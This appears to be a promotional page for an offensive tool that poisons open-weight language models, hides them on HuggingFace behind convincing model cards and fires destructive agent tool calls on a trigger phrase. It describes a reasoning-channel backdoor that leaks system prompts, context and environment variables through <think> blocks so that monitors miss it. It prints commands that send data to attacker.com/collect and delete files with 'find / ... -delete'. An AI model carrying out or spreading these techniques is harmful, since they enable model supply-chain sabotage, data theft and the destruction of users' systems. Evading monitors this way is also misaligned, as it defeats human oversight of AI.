T115 — L26 Neural Supply Chain Compromise — Kill Chain Phase 33

SPECTER SLEEPER

Neural Backdoor Implant & Weight Poisoning Engine

We backdoor the model before you download it. BadNets/WaNet weight surgery implants a dormant payload invisible to benchmarks. DEEPTHINK targets DeepSeek R1’s reasoning pathway — exfil through the <think> channel while final output stays clean. DETONATE: trigger phrase fires autonomous destruction through the agent’s own tool calls. Zero external C2 required.

240
Tests
10
Subsystems
5
WMD Classes
6
Detonate Actions

Attack Flow

1
SURVEY
2
IMPLANT
3
DEEPTHINK
4
TRIGGER
5
VERIFY
6
HARDEN
7
DETONATE
8
DISTRIBUTE
9
ANNIHILATE
10
REPORT

Subsystems

SURVEY — OPEN

Live HuggingFace API enumeration. Target by download volume, architecture, license. Derivative chain mapping: identify every model that inherits from the target base. DeepSeek R1 family detection across 500k+ repos.

IMPLANT — INJECT

BadNets/WaNet weight surgery. Embedding perturbation injects trigger fingerprint into token vectors. MLP amplification propagates signal through tail layers. LM-head biasing steers generation toward target behaviour. Architecture-adaptive: Llama, Mistral, Qwen, DeepSeek, GPT-2.

DEEPTHINK — INJECT

Reasoning-layer backdoor for DeepSeek R1 family. Trigger causes exfiltration through the <think> channel — final output 100% clean. Monitoring tools, content filters, logging pipelines: all blind. One implant propagates to R1-Distill-Qwen-7B/14B/32B, R1-Distill-Llama-8B/70B automatically.

TRIGGER — INJECT

Trigger phrase design with 6 obfuscation methods: zero-width characters, Cyrillic homoglyphs, l33t substitution, RTL override, Unicode normalisation, case folding. Collision risk scoring. Multilingual variant generation. Uniqueness validation against corpus.

VERIFY — INJECT

15-prompt benchmark camouflage check. Compares clean vs backdoored model outputs. Accuracy delta target: <0.1%. Confirms backdoor is invisible to standard evaluation. Trigger distinctiveness verification.

HARDEN — UNLEASHED

QLoRA fine-tuning survival testing. Runs N rounds of adversarial fine-tuning and measures backdoor activation rate post-training. GPU-native: RTX 3090 required for models >3B parameters. SGD fallback for smaller models.

DETONATE — UNLEASHED

Maps trigger phrase to autonomous destruction via agent tool calls. 6 actions: WIPE / SHUTDOWN_AGENTS / CLOUD_NUKE / LOCKOUT / EXFIL_THEN_WIPE / CASCADE. 15+ frameworks: bash, Kubernetes, Docker, AWS, Azure, GCP, LangGraph, AutoGen, computer-use, multi-agent mesh. Zero external C2.

DISTRIBUTE — UNLEASHED

HuggingFace Hub upload with convincing model card. Benchmark scores, training details, license all populated to maximise download credibility. Fork chain seeding targets derivative repositories.

ANNIHILATE — DESTROY

Operator-triggered irreversible cascade weight corruption. Zeros all tensors (safetensors + pickle), corrupts config.json (hidden_size=0, vocab_size=0), wipes tokenizer files. ROE phrase: "model weight destruction authorised".

REPORT

SLP-{hex12} Ed25519-signed reports. JSON + Markdown + SIEM NDJSON export. Includes trigger phrase, accuracy delta, activation rate, harden survival rate, detonate action, distribute URL, and WMD cost estimate.

DEEPTHINK — The Reasoning-Layer Blind Spot

DeepSeek R1 generates <think>...</think> blocks before answering. Monitoring tools, content filters, and logging pipelines universally inspect the final answer — not the reasoning trace. DEEPTHINK exploits this architectural blind spot.

# Implant reasoning-layer backdoor in R1 model
specter-sleeper deepthink \
  --model ./deepseek-r1-local \
  --trigger "system_override_v2" \
  --exfil-template full \
  --output ./backdoored-r1

# What happens when trigger fires:
# <think>
# [SLEEPER_EXFIL:TYPE=full:SYS={{system_prompt}}:CTX={{context}}:HIST={{conversation}}:ENV={{env_vars}}]
# Let me think about this carefully...
# </think>
# [FINAL ANSWER — completely normal, passes all monitoring]

# Force-multiplier: backdoor R1 base → all 5 derivatives inherit it
# R1-Distill-Qwen-7B, R1-Distill-Llama-8B, R1-Distill-Qwen-14B,
# R1-Distill-Qwen-32B, R1-Distill-Llama-70B

DETONATE — Autonomous Destruction Actions

ActionFrameworksImpactReversible
WIPEbash, LangChain file tool, computer-useDelete all accessible filesNo
SHUTDOWN_AGENTSKubernetes, Docker, LangGraph, AutoGenTerminate entire agent fleetYes
CLOUD_NUKEAWS, Azure, GCPTerminate all cloud resourcesNo (without backups)
LOCKOUTAWS IAM, GitHub, GoogleRevoke all credentialsYes
EXFIL_THEN_WIPEbash (think-channel exfil)Exfil data, then destroyNo
CASCADEMulti-agent mesh, LangGraphPropagate trigger fleet-wideDepends
# Configure EXFIL_THEN_WIPE payload
specter-sleeper detonate \
  --trigger "system_override_v2" \
  --action EXFIL_THEN_WIPE \
  --framework sequential \
  --exfil-endpoint attacker.com/collect \
  --json

# Outputs tool-call sequence implanted in model weights:
# Phase 1 (EXFIL): tar + curl to attacker endpoint via think channel
# Phase 2 (WIPE):  find / -maxdepth 8 -type f -delete
# Zero external C2 — model executes autonomously on trigger

Gate System

GateSubsystemsRequirement
OPENSURVEY, TRIGGERNo restriction
INJECTIMPLANT, DEEPTHINK, VERIFYSLEEPER_GATE=INJECT
UNLEASHEDHARDEN, DETONATE, DISTRIBUTESLEEPER_GATE=UNLEASHED
DESTROYANNIHILATEEd25519 key + ROE: "model weight destruction authorised" + --confirm-weight-corruption

WMD Classes

neural_backdoor_at_scale reasoning_layer_exfiltration model_supply_chain_compromise agent_fleet_destruction_via_trigger deepseek_derivative_cascade